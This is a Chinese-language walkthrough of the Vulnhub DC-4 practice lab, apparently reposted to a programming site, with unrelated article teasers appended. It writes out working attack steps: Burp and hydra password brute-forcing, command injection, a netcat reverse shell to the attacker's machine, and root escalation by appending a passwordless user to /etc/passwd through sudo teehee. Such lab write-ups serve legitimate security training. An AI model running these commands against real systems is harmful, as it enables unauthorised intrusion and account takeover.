Vulnhub靶场DC-4练习

news2024/11/9 10:01:53

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
  • 0x03 漏洞查找与利用
    • 1. 爆破登录
    • 2. 命令执行
    • 3. 反弹shell
    • 4. hydra爆破ssh
    • 5. 提权
  • 0x04 总结

0x00 准备

下载链接:https://download.vulnhub.com/dc/DC-4.zip

介绍:
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

重点:只有一个flag。




0x01 主机信息收集



kali本机IP:ifconfig ,网卡eth0,地址192.168.22.28 在这里插入图片描述





发现目标主机IP:netdiscover -i eth0 ,地址192.168.22.29。
在这里插入图片描述




探测目标主机开放端口:nmap -sS -sV -A -n 192.168.22.29,开放了22端口和80端口,其中80端口使用的nginx1.15.10。
在这里插入图片描述




0x02 站点信息收集




访问一下80端口:
在这里插入图片描述




看一下网站的目录结构:dirsearch -u 192.168.22.29 -e *
在这里插入图片描述




只有一个index.php,有其他的目录也全部重定向到这个页面中了。
index.php就只有一个登录框,其他有用的信息几乎没有。可以考虑爆破。
在这里插入图片描述




0x03 漏洞查找与利用

1. 爆破登录


输入username和password以后抓包,传输的明文的用户名和密码:
在这里插入图片描述


将抓到的包发送到Intruder(攻击)模块,Attack Type(攻击模式)先选择Sniper(狙击手)模式,盲猜username是admin,所以先只对password进行爆破:
在这里插入图片描述




payload set是对哪个字段进行爆破,前一步只设置了password一个字段。payload type选择Simple list简单字典即可。导入top1000的弱口令,点击start attack开始爆破:
在这里插入图片描述





对爆破的结果按照length进行排序,回显最长的这个是密码。
在这里插入图片描述




登录进来以后,看到下图左边的界面。点击command,到右边的界面。可以运行一些命令,点击run试一下,会回显运行的结果。考虑抓包进行命令执行。注意有个command.php文件。
在这里插入图片描述




2. 命令执行




选择一个命令,run一下,抓包。是通过radio这个参数提交run的命令的,并且命令的空格用+代替。
在这里插入图片描述





修改radio的值为cat command.php,看一下这个文件的内容。用的shell_exec(),直接考虑反弹shell。
在这里插入图片描述




3. 反弹shell


kali中安装netcat:sudo apt install netcat-traditional
kali中监听一个没有被占用的端口:nc -lvp 6666
在这里插入图片描述




在burpsuite中,执行:nc 192.168.22.28 6666 -e /bin/bash (kali的ip)
(将空格替换成+:nc+192.168.22.28+6666±e+/bin/bash)
在这里插入图片描述




forward上面的数据包以后,看到已经监听6666端口成功。
在这里插入图片描述




执行一下命令ls,可以看到成功。
在这里插入图片描述




执行命令:python -c "import pty;pty.spawn('/bin/bash')"
通过python的pty.spawn获得交互式shell。
在这里插入图片描述




4. hydra爆破ssh


去home目录下,找到jim用户,进入用户/home/jim/backups目录下面,有一个old-passwords.bak文件,文件内容是一些密码。并且目标机器开启了22端口,考虑是jim账户的密码。
在这里插入图片描述




把文件内容保存成a.txt。利用hydra对jim用户名进行爆破。
执行命令:hydra -l jim -P a.txt 192.168.22.29 ssh
在这里插入图片描述




ssh连接目标主机,用户名jim,密码jibril04。
命令:ssh jim@192.168.22.29
在这里插入图片描述




5. 提权


登录成功后提示有邮件。进入linux的邮件目录:cd /var/spool/mail/ ,查看jim文件内容,可以得到一个Charles用户给的密码。
在这里插入图片描述




切换到Charles用户:su Charles
查看当前用户的权限:sudo -l
在这里插入图片描述




考虑teehee提权。teehee命令可以往一个文件中追加内容,可以通过这个命令向/etc/passwd中追加一个超级用户,用户名为admin,没有密码,并且有root权限。
执行命令:echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
添加用户成功以后,切换到admin:su admin
进入root目录,可以看到flag.txt。
在这里插入图片描述

0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。

站点信息收集:

  1. dirsearch查看网站目录结构。
  2. 利用burpsuite的Intruder模块,弱口令爆破站点的登录密码。

漏洞利用:

  1. 命令执行,反弹shell。
  2. hydra爆破ssh。
  3. teehee提权。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1861443.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

短视频矩阵系统搭建APP源码开发

前言 短视频矩阵系统不仅有助于提升品牌影响力和营销效率,还能帮助企业更精准地触达目标受众,增强用户互动,并利用数据分析来持续优化营销策略。 一、短视频矩阵系统是什么? 短视频矩阵系统是一种通过多个短视频平台进行内容创作…

汉语翻译藏语软件,这几款软件不妨一试!

在全球化日益加深的今天,语言障碍成为了许多人在文化交流、商务洽谈或旅游探险中不得不面对的问题。特别是对于汉语和藏语这两种语言来说,由于其独特的文化背景和语法结构,翻译起来更是难上加难。不过,好在科技的进步为我们带来了…

可变分区管理 分区分配算法

First Fit Algorithm Best Fit Algorithm FFA:按照起始地址从小到大(本题为分区编号)找到第一个能装下进程的起始地址填入第二个表 此时 原表中将起始地址进程大小 分区大小-进程大小 如此继续 BFA:按分区大小排序 从小到大 找到…

面试-synchronized(java5以前唯一)和ReentrantLock的区别

1.ReentrantLock(再入锁): (1).在java.util.concurrent.locks包 (2).和CountDownLatch,FutureTask,Semaphore一样基于AQS实现。 AQS:AbstractQueuedSynchronizer 队列同步器。Java并发用来构建锁或其他同步主键的基础框架,是j.u.c…

vue3通过vue-video-player实现视频倍速、默认全屏、拖拽进度条等功能

效果图: 1、场景: js原生的video标签在不同浏览器及不同型号手机上都展示的不一样,一部分没有倍速,一部分没有全屏等功能,为了统一视频播放的交互功能,使用vue-video-player插件来完成,vue-vid…

3_电机的发展及学习方法

一、电机组成及发展 1、什么是励磁? 在电磁学中,励磁是通过电流产生磁场的过程。 发电机或电动机由在磁场中旋转的转子组成。磁场可以由 永磁体或励磁线圈产生。对于带有励磁线圈的机器,电流必须在线圈中流动才能产生(激发&#x…

基于JSP的列车票务信息管理系统

开头语: 你好,我是专注于计算机科学与技术研究的学长。如果你对列车票务信息管理系统感兴趣或有相关需求,欢迎联系我。 开发语言:Java 数据库:MySQL 技术:JSP技术 工具:IDE、数据库管理工具…

【java计算机毕设】网络教学平台java MySQL ssm vue html maven 项目设计 源代码+万字文档

目录 1项目功能 2项目介绍 3项目地址 1项目功能 【java计算机毕设】网络教学平台系统MySQL ssm vue html maven项目代码文档 小组作业 2项目介绍 系统功能: 网络教学平台系统包括管理员、学生、教师俩种角色。 管理员功能包括个人中心模块用于修改个人信息和密码…

HBDNY-40/1端子排电压继电器 DC110V 导轨安装 约瑟JOSEF

HBDNY系列端子排型电压电流继电器 系列型号:(3、4过/低电压型,5、6过/低电流型) HBDNY-30/1端子排型电压继电器;HBDNY-30/2端子排型电压继电器; HBDNY-30/3端子排型电压继电器;HBDNY-30/4端子…

芒果YOLOv10改进64:主干Backbone篇RepVGG结构:简单但功能强大的卷积神经网络架构

💡本篇内容:YOLOv10改进RepVGG结构:简单但功能强大的卷积神经网络架构 💡🚀🚀🚀本博客 改进源代码改进 适用于 YOLOv10 按步骤操作运行改进后的代码即可 💡本文提出改进 原创 方式:二次创新,YOLOv10 应部分读者要求,新增一篇RepVGG 论文理论部分 + 原创最…

AI视频教程下载-定制GPT:使用您的数据创建一个定制聊天GPT

Custom GPTs_ Create a Custom ChatGPT with Your Data 构建一个定制的GPT,与您自己的数据进行聊天。添加文档,生成图像,并集成API和Zapier。 这门全面的Udemy课程专为那些渴望学习如何创建自己定制版ChatGPT的人设计,以满足他们…

Java 面试笔记 | Java 基础:线程池

前言 在日常的工作学习生活中,用一种好的方法去学习,可以更加有效,比如费曼学习法:将学到的知识用自己的组织的语言表达出来,如果能够清晰明白的向别人解释清楚,那么就说明你是真的懂了,学会了…

常用调试器的接口介绍、支持标准及接线方法

目录 一、STLink接口介绍及接线方法 二、DAPLink接口介绍及接线方法 三、推荐购买链接🔗 一、STLink接口介绍及接线方法 第一种: 有10个接口,其中SWIM是STM8专用引脚。 查阅资料发现仅支持SWD标准,不支持JTAG标准。我们就知道…

深入理解桥接模式(Bridge Pattern)及其实际应用

引言 在软件开发过程中,设计模式为我们提供了优雅且高效的解决方案,以应对常见的设计问题。桥接模式(Bridge Pattern)作为一种结构型设计模式,旨在将抽象部分与其实现部分分离,使它们可以独立变化&#xf…

老杨说运维 | 基于业务全链路的端到端排障分析(文末附现场视频)

前言 青城山脚下的滔滔江水奔涌而过,承载着擎创一往无前的势头,共同去向未来。2024年6月,双态IT成都用户大会擎创科技“数智化可观测赋能双态运维”专场迎来了完满的收尾。 本期回顾来自擎创科技产品总监殷传旺的现场演讲:云原生…

雨量传感器设备的监测控制和智慧运维

雨量传感器是一种用于测量降雨量的设备,它通常通过一些感应机制来检测雨水的数量或强度。雨量传感器在气象监测、农业、水利等领域有着广泛应用。 在气象领域,它能为天气预报和气候研究提供重要的数据支持;在农业方面,可以帮助农民…

从零开始如何学习人工智能?

我接触AI的时候,是在研一。那个时候AlphaGo战胜围棋世界冠军李世石是大新闻,人工智能第一次出现我面前,当时就想搞清楚背后的原理以及这些技术有什么作用。 就开始找资料,看视频。随着了解的深入,对AI的兴趣就越大。这…

【已解决】Python报错:AttributeError: module ‘json‘ has no attribute ‘loads‘

😎 作者介绍:我是程序员行者孙,一个热爱分享技术的制能工人。计算机本硕,人工制能研究生。公众号:AI Sun,视频号:AI-行者Sun 🎈 本文专栏:本文收录于《AI实战中的各种bug…

snakeyaml从1.x升级2.x的方案

一、背景 因公司漏洞扫描,发现SnakeYAML 反序列化漏洞(CVE-2022-1471),所以要求对SnakYaml进行升级。 因项目中未直接引用snakyaml包,经分析是springboot引用的这个包。但是在这个项目中,springboot用的版本是2.3.12.RELEASE版本…

Linux系统学习——指令四

Linux系统学习——指令四 Linux 系统学习——指令四查看文件MD5校验和fuser 指令基本语法常用选项访问类型使用示例 系统信息 Linux 系统学习——指令四 查看文件MD5校验和 在Linux中,你可以使用 md5sum 命令来查看一个文件的MD5校验和。以下是具体的操作方法&…